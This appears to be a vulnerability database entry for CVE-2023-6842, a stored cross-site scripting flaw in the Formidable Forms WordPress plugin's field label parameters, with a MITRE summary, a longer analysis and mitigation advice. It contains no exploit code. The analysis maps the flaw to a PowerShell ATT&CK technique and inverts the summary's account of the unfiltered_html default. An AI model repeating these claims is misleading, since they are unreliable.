CVE-2023-6842 in Formidable Forms Plugin
Summary
by MITRE • 01/09/2024
The Formidable Forms – Contact Form, Survey, Quiz, Payment, Calculator Form & Custom Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the name field label and description field label parameter in all versions up to 6.7 (inclusive) due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. By default, this only affects multi-site installations and installations where unfiltered_html has been disabled. However, in the formidable settings admins can extend form creation, deletion and other management permissions to other user types, which makes it possible for this vulnerability to be exploited by lower level user types as long as they have been granted the proper permissions.
If you want to get best quality of vulnerability data, you may have to visit VulDB.
Analysis
by VulDB Data Team • 04/11/2026
The vulnerability identified as CVE-2023-6842 affects the Formidable Forms plugin for WordPress, a widely used tool for creating various types of forms including contact forms, surveys, quizzes, and payment forms. This plugin has been installed on numerous WordPress sites across the internet, making it a potentially significant attack vector for malicious actors targeting WordPress environments. The vulnerability stems from inadequate input sanitization and output escaping mechanisms within the plugin's codebase, specifically affecting the name field label and description field label parameters. The flaw exists in all versions up to and including version 6.7, representing a substantial attack surface given the plugin's popularity and the prevalence of older versions in production environments.
The technical implementation of this vulnerability allows for stored cross-site scripting attacks, which means that malicious scripts can be permanently stored on the server and executed whenever users access affected pages. The exploitation requires an authenticated attacker with administrator-level privileges, though the impact can be extended when administrators grant form management permissions to lower-privileged users. This creates a scenario where users with limited capabilities such as editors or authors might be able to inject malicious code if they have been granted appropriate permissions through the formidable settings. The vulnerability operates through the manipulation of field labels and descriptions, which are typically used for form customization and user interface elements, making the attack vector particularly insidious as it can be hidden within seemingly legitimate form configuration parameters.
The operational impact of this vulnerability extends beyond simple script execution, as it can potentially allow attackers to escalate privileges, steal user sessions, access sensitive data, or even take complete control of affected WordPress installations. The stored nature of the XSS vulnerability means that once a malicious script is injected, it will execute automatically for any user who accesses the affected pages, creating a persistent threat that can affect multiple users over time. The vulnerability's behavior is particularly concerning in multi-site WordPress installations where administrators might have broader permissions and where the attack surface is already expanded. Even in single-site installations where unfiltered_html is disabled by default, the vulnerability can still be exploited if administrators have modified the default security settings to allow more permissive HTML input.
Security practitioners should recognize this vulnerability as a classic example of CWE-79 - Improper Neutralization of Input During Web Page Generation, which is a fundamental web application security weakness that has been documented for decades. The issue also maps to ATT&CK technique T1059.001 - Command and Scripting Interpreter: PowerShell, as the injected scripts can potentially be used to execute malicious commands on compromised systems. Organizations should immediately update to the latest version of the Formidable Forms plugin to mitigate this vulnerability, while also implementing additional security measures such as restricting form management permissions to only essential administrators. The vulnerability highlights the importance of proper input validation and output escaping in web applications, particularly in plugins that handle user-generated content and configuration parameters. Regular security audits and vulnerability assessments should be conducted to identify similar weaknesses in other WordPress plugins and themes, as the complexity of WordPress ecosystems makes such vulnerabilities increasingly common and potentially devastating when exploited at scale.